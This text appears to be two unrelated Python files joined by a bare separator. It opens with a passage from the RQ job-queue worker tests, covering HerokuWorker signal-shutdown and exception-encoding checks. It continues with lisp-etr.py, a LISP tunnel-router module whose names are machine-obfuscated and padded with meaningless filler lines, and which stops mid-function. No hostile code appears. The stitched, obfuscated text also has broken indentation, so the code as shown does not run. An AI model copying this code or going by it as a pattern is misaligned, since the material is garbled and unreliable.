        """Schedule a job, then run the worker as subprocess"""
        queue = Queue()
        job = queue.enqueue(access_self)
        self._run_burst_worker()
        self.assertTrue(job in FinishedJobRegistry(queue=queue))
        assert queue.count == 0

    @skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
    def test_run_scheduled_access_self(self):
        """Schedule a job that schedules a job, then run the worker as subprocess"""
        queue = Queue()
        job = queue.enqueue(schedule_access_self)
        self._run_burst_worker()
        self.assertTrue(job in FinishedJobRegistry(queue=queue))
        assert queue.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    # Exercises HerokuWorker's SIGRTMIN-based shutdown protocol using a
    # dummy worker subprocess that records its progress as marker files
    # ('started', 'finished', 'stderr.log') inside a sandbox directory.

    def setUp(self):
        super(HerokuWorkerShutdownTestCase, self).setUp()
        # Scratch directory the dummy worker writes its marker files into.
        self.sandbox = '/tmp/rq_shutdown/'
        os.makedirs(self.sandbox)

    def tearDown(self):
        shutil.rmtree(self.sandbox, ignore_errors=True)

    @slow
    def test_immediate_shutdown(self):
        """Heroku work horse shutdown with immediate (0 second) kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        # The job started but was aborted before it could finish.
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
        with open(os.path.join(self.sandbox, 'stderr.log')) as f:
            stderr = f.read().strip('\n')
            err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
            self.assertTrue(stderr.endswith(err), stderr)

    @slow
    def test_1_sec_shutdown(self):
        """Heroku work horse shutdown with 1 second kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        time.sleep(0.1)
        # Still alive right after the signal: the 1s grace period is running.
        self.assertEqual(p.exitcode, None)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
        with open(os.path.join(self.sandbox, 'stderr.log')) as f:
            stderr = f.read().strip('\n')
            # After the grace period the abort comes from SIGALRM, not SIGRTMIN.
            err = 'ShutDownImminentException: shut down imminent (signal: SIGALRM)'
            self.assertTrue(stderr.endswith(err), stderr)

    @slow
    def test_shutdown_double_sigrtmin(self):
        """Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        # we have to wait a short while otherwise the second signal won't be processed.
        time.sleep(0.1)
        os.kill(p.pid, signal.SIGRTMIN)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
        with open(os.path.join(self.sandbox, 'stderr.log')) as f:
            stderr = f.read().strip('\n')
            err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
            self.assertTrue(stderr.endswith(err), stderr)

    @mock.patch('rq.worker.logger.info')
    def test_handle_shutdown_request(self, mock_logger_info):
        """Mutate HerokuWorker so _horse_pid refers to an artificial process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')

        path = os.path.join(self.sandbox, 'shouldnt_exist')
        p = Process(target=create_file_after_timeout, args=(path, 2))
        p.start()
        self.assertEqual(p.exitcode, None)

        w._horse_pid = p.pid
        w.handle_warm_shutdown_request()
        p.join(2)
        # would expect p.exitcode to be -34 (killed by SIGRTMIN, Linux rt signal 34)
        self.assertEqual(p.exitcode, -34)
        # The fake horse died before it could create its file.
        self.assertFalse(os.path.exists(path))
        mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)

    def test_handle_shutdown_request_no_horse(self):
        """Mutate HerokuWorker so _horse_pid refers to non existent process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')

        # Killing a non-existent pid must be tolerated, not raise.
        w._horse_pid = 19999
        w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
    """Exception handling must tolerate non-ASCII exception messages."""

    def setUp(self):
        super(TestExceptionHandlerMessageEncoding, self).setUp()
        # Mimic how exception info is actually passed forwards
        try:
            raise Exception(u"💪")
        except Exception:
            self.exc_info = sys.exc_info()
        self.worker = Worker("foo")
        self.worker._exc_handlers = []

    def test_handle_exception_handles_non_ascii_in_exception_message(self):
        """worker.handle_exception doesn't crash on non-ascii in exception message."""
        self.worker.handle_exception(Mock(), *self.exc_info)
|
lisp-etr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try :
import pytun
except :
pytun = None
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
# --- Obfuscated module globals for the LISP ETR process. ---
# Names below were mangled by an obfuscator; the `if N - N:` statements are
# dead-code filler it inserted (the condition is always 0/false).

# IGMP/multicast control message type code -> printable name
# (17=query, 18=v1-report, 22=v2-report, 34=v3-report, etc.).
IiII1IiiIiI1 = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
 20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
 30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 40 - 40: oo * OoO0O00
if 2 - 2: ooOO00oOo % oOo0O0Ooo * Ooo00oOo00o . oOoO0oo0OOOo + iiiiIi11i
if 24 - 24: II11iiII / OoOO0ooOOoo0O + o0000oOoOoO0o * i1I1ii1II1iII % oooO0oo0oOOOO
if 53 - 53: o0oo0o / Oo + o0oo0o / oooO0oo0oOOOO * OoooooooOO + i1I1ii1II1iII
if 71 - 71: II11iiII * i1I1ii1II1iII . II11iiII / o0oo0o
if 14 - 14: iIii1I11I1II1
o0oOoO00o = None    # purpose not visible in this chunk -- TODO confirm at assignment sites
i1 = None           # threading.Timer that kicks off registration (see OoooooOoo below)
oOOoo00O0O = None   # purpose not visible in this chunk -- TODO confirm at assignment sites
i1111 = None        # purpose not visible in this chunk -- TODO confirm at assignment sites
i11 = lisp . lisp_get_ephemeral_port ( )    # this ETR's local ephemeral port
I11 = None          # purpose not visible in this chunk -- TODO confirm at assignment sites
Oo0o0000o0o0 = [ None , None , None ]       # 3-slot socket list handed to the register timer
oOo0oooo00o = None  # purpose not visible in this chunk -- TODO confirm at assignment sites
oO0o0o0ooO0oO = None  # purpose not visible in this chunk -- TODO confirm at assignment sites
oo0o0O00 = None     # purpose not visible in this chunk -- TODO confirm at assignment sites
if 68 - 68: II11iiII . oo / i1I1ii1II1iII
oOOoo = 60          # seconds -- presumably a periodic timer interval, TODO confirm
if 43 - 43: o0oo0o % oo - i11iIiiIii - ooOO00oOo / II11iiII - oOo0O0Ooo
if 45 - 45: o0oo0o + o0000oOoOoO0o
if 17 - 17: Ooo00oOo00o
if 64 - 64: o0000oOoOoO0o % i1IIi % OoooooooOO
if 3 - 3: i1I1ii1II1iII + O0
if 42 - 42: II11iiII / i1IIi + i11iIiiIii - o0000oOoOoO0o
if 78 - 78: ooOO00oOo
if 18 - 18: O0 - i1I1ii1II1iII / i1I1ii1II1iII + Oo % Oo - oooO0oo0oOOOO
if 62 - 62: i1I1ii1II1iII - oooO0oo0oOOOO - oOo0O0Ooo % i1IIi / iiiiIi11i
def OoooooOoo ( kv_pair ) :
    """Handle a database-mapping configuration clause (obfuscated name).

    Records the mapping via lispconfig, then -- unless NAT traversal is
    enabled -- arms a one-shot 5-second timer whose callback `ooO0o0Oo`
    (defined elsewhere in this file; presumably the periodic
    Map-Register driver -- TODO confirm) runs when at least one
    map-server is configured.
    """
    global i1              # registration Timer (module global)
    global Oo0o0000o0o0    # socket list passed to the timer callback
    if 70 - 70: ooOO00oOo . ooOO00oOo - ooOO00oOo / oOoO0oo0OOOo * II111iiII
    # i11 is this ETR's ephemeral port (module global).
    lispconfig . lisp_database_mapping_command ( kv_pair , i11 )
    if 86 - 86: i11iIiiIii + o0000oOoOoO0o + Oo * OoOO0ooOOoo0O + Ooo00oOo00o
    if 61 - 61: ooOO00oOo / i11iIiiIii
    if 34 - 34: OoooooooOO + iIii1I11I1II1 + i11iIiiIii - oOoO0oo0OOOo + i11iIiiIii
    if 65 - 65: oOo0O0Ooo
    if 6 - 6: oo / OoO0O00 % o0000oOoOoO0o
    if 84 - 84: i11iIiiIii . Ooo00oOo00o
    if 100 - 100: o0000oOoOoO0o - o0000oOoOoO0o - o0oo0o
    if 20 - 20: OoooooooOO
    # In NAT-traversal mode registration is driven elsewhere -- skip the timer.
    if ( lisp . lisp_nat_traversal ) : return
    # Timer already armed and running: nothing to do.
    if ( i1 != None and
         i1 . is_alive ( ) ) : return
    if 13 - 13: i1IIi - o0000oOoOoO0o % iiiiIi11i / iIii1I11I1II1 % i1I1ii1II1iII
    if ( len ( lisp . lisp_map_servers_list ) > 0 ) :
        i1 = threading . Timer ( 5 ,
            ooO0o0Oo , [ Oo0o0000o0o0 ] )
        i1 . start ( )
if 78 - 78: iIii1I11I1II1 - o0000oOoOoO0o * ooOO00oOo + Ooo00oOo00o + i1I1ii1II1iII + i1I1ii1II1iII
if 11 - 11: i1I1ii1II1iII - ooOO00oOo % Oo % i1I1ii1II1iII / oOo0O0Ooo - ooOO00oOo
if 74 - 74: i1I1ii1II1iII * O0
if 89 - 89: iiiiIi11i + OoO0O00
if 3 - 3: i1IIi / oo % OoOO0ooOOoo0O * i11iIiiIii / O0 * OoOO0ooOOoo0O
if 49 - 49: iiiiIi11i % o0000oOoOoO0o + i1IIi . oo % oOoO0oo0OOOo
if 48 - 48: OoOO0ooOOoo0O + OoOO0ooOOoo0O / II111iiii / iIii1I11I1II1
if 20 - 20: Ooo00oOo00o
def oO00 ( clause ) :
    """Build the ETR status "show" page (obfuscated name).

    Accumulates an HTML/text report into one string: local RLOCs, decap
    statistics, the configured map-server table, the database-mapping
    list, and -- when configured -- ELP, RLE, JSON and group-mapping
    listings.  Returns the accumulated output.  `clause` is part of the
    show-command dispatch signature (unused here).
    """
    if 53 - 53: OoooooooOO . i1IIi
    if 18 - 18: Ooo00oOo00o
    if 28 - 28: II11iiII - oooO0oo0oOOOO . oooO0oo0oOOOO + oOo0O0Ooo - OoooooooOO + O0
    if 95 - 95: ooOO00oOo % iiiiIi11i . O0
    # Start with this system's RLOC addresses.
    I1i1I = lispconfig . lisp_show_myrlocs ( "" )
    if 80 - 80: oOo0O0Ooo - ooOO00oOo
    if 87 - 87: iiiiIi11i / OoOO0ooOOoo0O - i1IIi * II11iiII / OoooooooOO . O0
    if 1 - 1: II111iiii - OoOO0ooOOoo0O / OoOO0ooOOoo0O
    if 46 - 46: o0000oOoOoO0o * II11iiII - ooOO00oOo * iiiiIi11i - o0oo0o
    # Append decapsulation statistics for the ETR role.
    I1i1I = lispconfig . lisp_show_decap_stats ( I1i1I , "ETR" )
    if 83 - 83: OoooooooOO
    if 31 - 31: II111iiii - II11iiII . o0oo0o % oOo0O0Ooo - O0
    if 4 - 4: II111iiii / Oo . i1I1ii1II1iII
    if 58 - 58: II11iiII * i11iIiiIii / oOo0O0Ooo % o0oo0o - oOoO0oo0OOOo / iiiiIi11i
    # Map-server table: hover text explains the registration flag letters.
    ii11i1 = "{} configured map-servers" . format ( len ( lisp . lisp_map_servers_list ) )
    IIIii1II1II = lisp . lisp_span ( "LISP-ETR Configured Map-Servers:" , ii11i1 )
    ii11i1 = ( "P = proxy-reply requested, M = merge-registrations " + "requested, N = Map-Notify requested" )
    if 42 - 42: o0000oOoOoO0o + iiiiIi11i
    o0O0o0Oo = lisp . lisp_span ( "Registration<br>flags" , ii11i1 )
    if 16 - 16: O0 - o0oo0o * iIii1I11I1II1 + i1I1ii1II1iII
    I1i1I += lispconfig . lisp_table_header ( IIIii1II1II , "Address" , "Auth-Type" ,
        "xTR-ID" , "Site-ID" , o0O0o0Oo , "Map-Registers<br>Sent" ,
        "Map-Notifies<br>Received" )
    if 50 - 50: II111iiii - Oo * oOoO0oo0OOOo / o0oo0o + Ooo00oOo00o
    # One row per configured map-server.
    for O0O0O in lisp . lisp_map_servers_list . values ( ) :
        O0O0O . resolve_dns_name ( )
        # Prefix the address with the ms-name unless it's the default "all".
        oO0Oo = "" if O0O0O . ms_name == "all" else O0O0O . ms_name + "<br>"
        oOOoo0Oo = oO0Oo + O0O0O . map_server . print_address ( )
        if ( O0O0O . dns_name ) : oOOoo0Oo += "<br>" + O0O0O . dns_name
        if 78 - 78: OoOO0ooOOoo0O
        OO00Oo = "0x" + lisp . lisp_hex_string ( O0O0O . xtr_id )
        # Upper-case letter = flag set, lower-case = flag clear.
        O0OOO0OOoO0O = "{}-{}-{}-{}" . format ( "P" if O0O0O . proxy_reply else "p" ,
            "M" if O0O0O . merge_registrations else "m" ,
            "N" if O0O0O . want_map_notify else "n" ,
            "R" if O0O0O . refresh_registrations else "r" )
        if 70 - 70: oooO0oo0oOOOO * OoO0O00 * OoOO0ooOOoo0O / o0000oOoOoO0o
        # Total registers sent = unicast + multicast counts.
        oO = O0O0O . map_registers_sent + O0O0O . map_registers_multicast_sent
        if 93 - 93: ooOO00oOo % iiiiIi11i . ooOO00oOo * o0oo0o % o0000oOoOoO0o . II111iiii
        if 38 - 38: Ooo00oOo00o
        I1i1I += lispconfig . lisp_table_row ( oOOoo0Oo ,
            "sha1" if ( O0O0O . alg_id == lisp . LISP_SHA_1_96_ALG_ID ) else "sha2" ,
            OO00Oo , O0O0O . site_id , O0OOO0OOoO0O , oO ,
            O0O0O . map_notifies_received )
    if 57 - 57: O0 / iiiiIi11i * o0oo0o / oOo0O0Ooo . II111iiii
    I1i1I += lispconfig . lisp_table_footer ( )
    if 26 - 26: i1I1ii1II1iII
    if 91 - 91: ooOO00oOo . oOoO0oo0OOOo + ooOO00oOo - i1I1ii1II1iII / OoooooooOO
    if 39 - 39: oOoO0oo0OOOo / Oo - II111iiii
    if 98 - 98: oOoO0oo0OOOo / OoOO0ooOOoo0O % iiiiIi11i . oOo0O0Ooo
    # Database-mapping (EID-to-RLOC) listing for the ETR.
    I1i1I = lispconfig . lisp_show_db_list ( "ETR" , I1i1I )
    if 91 - 91: iiiiIi11i % OoO0O00
    if 64 - 64: OoOO0ooOOoo0O % i1I1ii1II1iII - o0oo0o - iiiiIi11i
    if 31 - 31: OoOO0ooOOoo0O - II111iiii . OoOO0ooOOoo0O
    if 18 - 18: Ooo00oOo00o
    # Optional sections -- only rendered when the lists are non-empty.
    if ( len ( lisp . lisp_elp_list ) != 0 ) :
        I1i1I = lispconfig . lisp_show_elp_list ( I1i1I )
    if 98 - 98: i1I1ii1II1iII * i1I1ii1II1iII / i1I1ii1II1iII + OoOO0ooOOoo0O
    if 34 - 34: Oo
    if 15 - 15: OoOO0ooOOoo0O * Oo * OoO0O00 % i11iIiiIii % oOo0O0Ooo - II11iiII
    if 68 - 68: o0oo0o % i1IIi . oooO0oo0oOOOO . oOoO0oo0OOOo
    if 92 - 92: i1I1ii1II1iII . o0oo0o
    if ( len ( lisp . lisp_rle_list ) != 0 ) :
        I1i1I = lispconfig . lisp_show_rle_list ( I1i1I )
    if 31 - 31: o0oo0o . oOo0O0Ooo / O0
    if 89 - 89: oOo0O0Ooo
    if 68 - 68: ooOO00oOo * OoooooooOO % O0 + ooOO00oOo + Oo
    if 4 - 4: Oo + O0 * II11iiII
    if 55 - 55: OoO0O00 + iIii1I11I1II1 / oOo0O0Ooo * iiiiIi11i - i11iIiiIii - o0000oOoOoO0o
    if ( len ( lisp . lisp_json_list ) != 0 ) :
        I1i1I = lispconfig . lisp_show_json_list ( I1i1I )
    if 25 - 25: oOoO0oo0OOOo
    if 7 - 7: i1IIi / oo * o0oo0o . oooO0oo0oOOOO . iIii1I11I1II1
    if 13 - 13: II11iiII / i11iIiiIii
    if 2 - 2: oo / O0 / Ooo00oOo00o % oOo0O0Ooo % o0000oOoOoO0o
    if 52 - 52: Ooo00oOo00o
    # Multicast group-mapping table.
    if ( len ( lisp . lisp_group_mapping_list ) != 0 ) :
        IIIii1II1II = "Configured Group Mappings:"
        I1i1I += lispconfig . lisp_table_header ( IIIii1II1II , "Name" , "Group Prefix" ,
            "Sources" , "Use MS" )
        for o0OO0oOO0O0 in lisp . lisp_group_mapping_list . values ( ) :
            # Build a comma-separated source list; "*" means any source.
            iiiIIi1II = ""
            for o0O00oOoOO in o0OO0oOO0O0 . sources : iiiIIi1II += o0O00oOoOO + ", "
            if ( iiiIIi1II == "" ) :
                iiiIIi1II = "*"
            else :
                # Trim the trailing ", " left by the join loop above.
                iiiIIi1II = iiiIIi1II [ 0 : - 2 ]
            if 42 - 42: ooOO00oOo
            I1i1I += lispconfig . lisp_table_row ( o0OO0oOO0O0 . group_name ,
                o0OO0oOO0O0 . group_prefix . print_prefix ( ) , iiiIIi1II , o0OO0oOO0O0 . use_ms_name )
        if 67 - 67: o0oo0o . i1I1ii1II1iII . O0
        I1i1I += lispconfig . lisp_table_footer ( )
    if 10 - 10: oOoO0oo0OOOo % oOoO0oo0OOOo - iIii1I11I1II1 / II11iiII + o0000oOoOoO0o
    return ( I1i1I )
if 87 - 87: iiiiIi11i * oOoO0oo0OOOo + II11iiII / iIii1I11I1II1 / i1I1ii1II1iII
if 37 - 37: i1I1ii1II1iII - Oo * iiiiIi11i % i11iIiiIii - o0oo0o
if 83 - 83: OoOO0ooOOoo0O / oo
if 34 - 34: oooO0oo0oOOOO
if 57 - 57: iiiiIi11i . OoOO0ooOOoo0O . i1IIi
if 42 - 42: OoOO0ooOOoo0O + oOoO0oo0OOOo % O0
if 6 - 6: iiiiIi11i
def oOOo0oOo0 ( parameter ) :
    """Return the ETR crypto-key listing from lispconfig (obfuscated name).

    `parameter` is part of the show-command dispatch signature but unused.
    """
    return ( lispconfig . lisp_show_crypto_list ( "ETR" ) )
if 49 - 49: OoO0O00 . i11iIiiIii - i1IIi / II111iiii . oo
if 1 - 1: OoO0O00 / Ooo00oOo00o % i1I1ii1II1iII * oooO0oo0oOOOO . i11iIiiIii
if 2 - 2: oOoO0oo0OOOo * OoOO0ooOOoo0O - iIii1I11I1II1 + oo . iiiiIi11i % i1I1ii1II1iII
if 92 - 92: i1I1ii1II1iII
if 25 - 25: OoO0O00 - oo / OoooooooOO / Ooo00oOo00o
if 12 - 12: oo * i1I1ii1II1iII % i1IIi % iIii1I11I1II1
if 20 - 20: II11iiII % o0000oOoOoO0o / o0000oOoOoO0o + o0000oOoOoO0o
def III1IiiI(kv_pairs):
    """Process a "lisp map-server" configuration clause.

    Creates a lisp.lisp_ms() entry for every non-empty address and
    dns-name supplied.  When the first map-server appears, Info-Request
    processing is kicked off; unless NAT-traversal is active, an
    immediate Map-Register is sent to the new map-server and the
    periodic Map-Register timer is armed.
    """
    global i1
    global oOOoo00O0O

    addresses = []
    dns_names = []
    key_id = 0
    alg_id = 0
    password = ""
    proxy_reply = False
    merge = False
    refresh = False
    want_notify = False
    site_id = 0
    ms_name = None
    ekey_id = 0
    ekey = None

    # Each keyword appears at most once, so an elif chain is equivalent
    # to the original independent tests.
    for keyword in kv_pairs.keys():
        value = kv_pairs[keyword]
        if (keyword == "ms-name"):
            ms_name = value[0]
        elif (keyword == "address"):
            addresses.extend(value)
        elif (keyword == "dns-name"):
            dns_names.extend(value)
        elif (keyword == "authentication-type"):
            # "sha1" or "sha2"; any other value leaves an empty alg-id.
            alg_id = lisp.LISP_SHA_1_96_ALG_ID if (value == "sha1") else \
                lisp.LISP_SHA_256_128_ALG_ID if (value == "sha2") else ""
        elif (keyword == "authentication-key"):
            # Default to sha2 when no authentication-type was given.
            if (alg_id == 0): alg_id = lisp.LISP_SHA_256_128_ALG_ID
            parsed = lisp.lisp_parse_auth_key(value)
            key_id = parsed.keys()[0]
            password = parsed[key_id]
        elif (keyword == "proxy-reply"):
            proxy_reply = (value == "yes")
        elif (keyword == "merge-registrations"):
            merge = (value == "yes")
        elif (keyword == "refresh-registrations"):
            refresh = (value == "yes")
        elif (keyword == "want-map-notify"):
            want_notify = (value == "yes")
        elif (keyword == "site-id"):
            site_id = int(value)
        elif (keyword == "encryption-key"):
            parsed = lisp.lisp_parse_auth_key(value)
            ekey_id = parsed.keys()[0]
            ekey = parsed[ekey_id]

    # Build one map-server entry per literal address and per dns-name.
    ms = None
    for addr in addresses:
        if (addr == ""): continue
        ms = lisp.lisp_ms(addr, None, ms_name, alg_id, key_id, password,
            proxy_reply, merge, refresh, want_notify, site_id, ekey_id, ekey)
    for name in dns_names:
        if (name == ""): continue
        ms = lisp.lisp_ms(None, name, ms_name, alg_id, key_id, password,
            proxy_reply, merge, refresh, want_notify, site_id, ekey_id, ekey)

    # First configured map-server: start Info-Request processing shortly.
    first_ms = (len(lisp.lisp_map_servers_list) == 1)
    if (first_ms):
        ms = lisp.lisp_map_servers_list.values()[0]
        oOOoo00O0O = threading.Timer(2, oOo0O, [ms.map_server])
        oOOoo00O0O.start()

    # With NAT-traversal we wait for Info-Replies before registering.
    if (lisp.lisp_nat_traversal): return

    # Send a Map-Register right away to the newly configured map-server.
    if (ms and len(lisp.lisp_db_list) > 0):
        O00oO000O0O(Oo0o0000o0o0, None, None, ms, False)

    # Arm the periodic Map-Register timer if it is not already running.
    if (len(lisp.lisp_db_list) > 0):
        if (i1 != None and i1.is_alive()): return
        i1 = threading.Timer(5, ooO0o0Oo, [Oo0o0000o0o0])
        i1.start()
    return
if 72 - 72: o0000oOoOoO0o
if 1 - 1: ooOO00oOo * oooO0oo0oOOOO * OoooooooOO + Oo
if 33 - 33: O0 * Ooo00oOo00o - o0oo0o % o0oo0o
if 18 - 18: o0oo0o / OoO0O00 * o0oo0o + o0oo0o * i11iIiiIii * oOoO0oo0OOOo
if 11 - 11: Oo / oOo0O0Ooo - oooO0oo0oOOOO * OoooooooOO + OoooooooOO . oOo0O0Ooo
if 26 - 26: o0000oOoOoO0o % oOoO0oo0OOOo
if 76 - 76: oooO0oo0oOOOO * i1I1ii1II1iII
def ooooooo00o(kv_pairs):
    """Process a "lisp group-mapping" configuration clause and install it.

    Collects the group name, group prefix, instance-id, source list,
    optional ms-name, and optional RLE address, then builds a
    lisp.lisp_group_mapping and adds it to the group-mapping list.

    NOTE(review): when no "group-name" key is supplied, the constructor
    call below raises NameError -- presumably the command parser always
    provides one; confirm against the caller.
    """
    sources = []
    group_prefix = None
    rle_address = None
    ms_name = "all"

    for keyword in kv_pairs.keys():
        value = kv_pairs[keyword]
        if (keyword == "group-name"):
            group_name = value
        elif (keyword == "group-prefix"):
            if (group_prefix == None):
                group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
            group_prefix.store_prefix(value)
        elif (keyword == "instance-id"):
            if (group_prefix == None):
                group_prefix = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
            group_prefix.instance_id = int(value)
        elif (keyword == "ms-name"):
            ms_name = value[0]
        elif (keyword == "address"):
            # Ignore empty source-address slots.
            sources.extend([a for a in value if a != ""])
        elif (keyword == "rle-address"):
            if (rle_address == None):
                rle_address = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
            rle_address.store_address(value)

    mapping = lisp.lisp_group_mapping(group_name, ms_name, group_prefix,
        sources, rle_address)
    mapping.add_group()
    return
if 81 - 81: Oo - iIii1I11I1II1 - i1IIi / o0oo0o - O0 * OoOO0ooOOoo0O
if 20 - 20: iiiiIi11i % oooO0oo0oOOOO
if 19 - 19: oOoO0oo0OOOo % oooO0oo0oOOOO + Oo / o0oo0o . Oo
if 12 - 12: i1IIi + i1IIi - oOoO0oo0OOOo * OoO0O00 % OoO0O00 - II111iiii
if 52 - 52: Oo . i1I1ii1II1iII + o0oo0o
if 38 - 38: i1IIi - II111iiii . o0oo0o
if 58 - 58: oo . i1I1ii1II1iII + oOo0O0Ooo
def O00OO(quiet, db, eid, group, ttl):
    # Build the EID-record/RLOC-record payload of a Map-Register for one
    # database-mapping entry.
    #
    #   quiet -- suppress per-record logging (used when many entries register)
    #   db    -- database-mapping entry (supplies rloc_set, use_ms_name)
    #   eid   -- EID address/prefix to register
    #   group -- multicast group copied into each EID-record
    #   ttl   -- record TTL to advertise
    #
    # Returns (packet_bytes, eid_record_count): one EID-record is emitted
    # per instance-id in [eid.instance_id] + eid.iid_list.
    if 17 - 17: OoOO0ooOOoo0O / o0oo0o + iiiiIi11i - i11iIiiIii . i1I1ii1II1iII
    if 95 - 95: ooOO00oOo % i1IIi * i11iIiiIii % OoO0O00 - iiiiIi11i
    if 67 - 67: oOo0O0Ooo + oOoO0oo0OOOo . Ooo00oOo00o . II111iiii
    if 98 - 98: i1I1ii1II1iII
    if 68 - 68: iIii1I11I1II1 * iIii1I11I1II1 . Ooo00oOo00o / II111iiii % OoO0O00
    if 38 - 38: Oo - II11iiII / i1I1ii1II1iII
    if 66 - 66: O0 % oOoO0oo0OOOo + i11iIiiIii . oOo0O0Ooo / o0000oOoOoO0o + oOoO0oo0OOOo
    if 86 - 86: Ooo00oOo00o
    # Collect RTRs to advertise as additional RLOCs when any local RLOC is
    # NAT-translated.  Only the first translated RLOC triggers collection --
    # note the unconditional 'break' ending the outer loop after one pass.
    i1Iii11Ii1i1 = {}
    for OOooo0O0o0 in db.rloc_set:
        if (OOooo0O0o0.translated_rloc.is_null()): continue
        if 14 - 14: Ooo00oOo00o % O0 * i1I1ii1II1iII + o0000oOoOoO0o + OoO0O00 * o0000oOoOoO0o
        for iII1I1IiI11ii in lisp.lisp_rtr_list:
            OooooOoooO = lisp.lisp_rtr_list[iII1I1IiI11ii]
            # Skip RTRs with no known address unless configured to
            # register all RTRs.
            if (lisp.lisp_register_all_rtrs == False and OooooOoooO == None):
                lisp.lprint(" Exclude unreachable RTR {}".format(lisp.red(iII1I1IiI11ii, False)))
                if 56 - 56: OoO0O00 . oOoO0oo0OOOo . oo
                continue
            if 39 - 39: O0 + o0oo0o
            if (OooooOoooO == None): continue
            i1Iii11Ii1i1[iII1I1IiI11ii] = OooooOoooO
        if 91 - 91: OoooooooOO - iIii1I11I1II1 + oOo0O0Ooo / ooOO00oOo . oOo0O0Ooo + O0
        break
    if 26 - 26: oOoO0oo0OOOo - OoooooooOO
    if 11 - 11: oo * iiiiIi11i
    # Emit one EID-record (plus its RLOC-records) per instance-id.
    o000oo = 0
    o00o0 = ""
    for II1I in [eid.instance_id] + eid.iid_list:
        II1I1I1Ii = lisp.lisp_eid_record()
        if 70 - 70: ooOO00oOo % iiiiIi11i + II11iiII / o0000oOoOoO0o % O0
        II1I1I1Ii.rloc_count = len(db.rloc_set) + len(i1Iii11Ii1i1)
        II1I1I1Ii.authoritative = True
        II1I1I1Ii.record_ttl = ttl
        II1I1I1Ii.eid.copy_address(eid)
        II1I1I1Ii.eid.instance_id = II1I
        II1I1I1Ii.eid.iid_list = []
        II1I1I1Ii.group.copy_address(group)
        if 100 - 100: Ooo00oOo00o + II11iiII * Ooo00oOo00o
        o00o0 += II1I1I1Ii.encode()
        if (not quiet):
            oOOo0OOOo00O = eid.print_prefix()
            lisp.lprint(" EID-prefix {} for ms-name '{}'".format(lisp.green(oOOo0OOOo00O, False), db.use_ms_name))
            if 76 - 76: i11iIiiIii + Ooo00oOo00o / oOoO0oo0OOOo - ooOO00oOo - o0000oOoOoO0o + oOoO0oo0OOOo
            II1I1I1Ii.print_record(" ", False)
        if 51 - 51: iIii1I11I1II1 . Oo + iIii1I11I1II1
        if 95 - 95: oo
        # The entry's own RLOC-set.
        for OOooo0O0o0 in db.rloc_set:
            iII1ii1 = lisp.lisp_rloc_record()
            iII1ii1.store_rloc_entry(OOooo0O0o0)
            iII1ii1.local_bit = OOooo0O0o0.rloc.is_local()
            iII1ii1.reach_bit = True
            o00o0 += iII1ii1.encode()
            if (not quiet): iII1ii1.print_record(" ")
        if 12 - 12: II11iiII - Oo . OoooooooOO / oOoO0oo0OOOo . i1IIi * ooOO00oOo
        if 19 - 19: i11iIiiIii + OoooooooOO - OoO0O00 - OoOO0ooOOoo0O
        if 21 - 21: O0 % oooO0oo0oOOOO . oo / II111iiii + oooO0oo0oOOOO
        if 53 - 53: iiiiIi11i - oo - iiiiIi11i * i1I1ii1II1iII
        if 71 - 71: O0 - iIii1I11I1II1
        if 12 - 12: II11iiII / Ooo00oOo00o
        # Append one low-priority RLOC-record per NAT-traversal RTR
        # collected above.
        for OooooOoooO in i1Iii11Ii1i1.values():
            iII1ii1 = lisp.lisp_rloc_record()
            iII1ii1.rloc.copy_address(OooooOoooO)
            iII1ii1.priority = 254
            iII1ii1.rloc_name = "RTR"
            iII1ii1.weight = 0
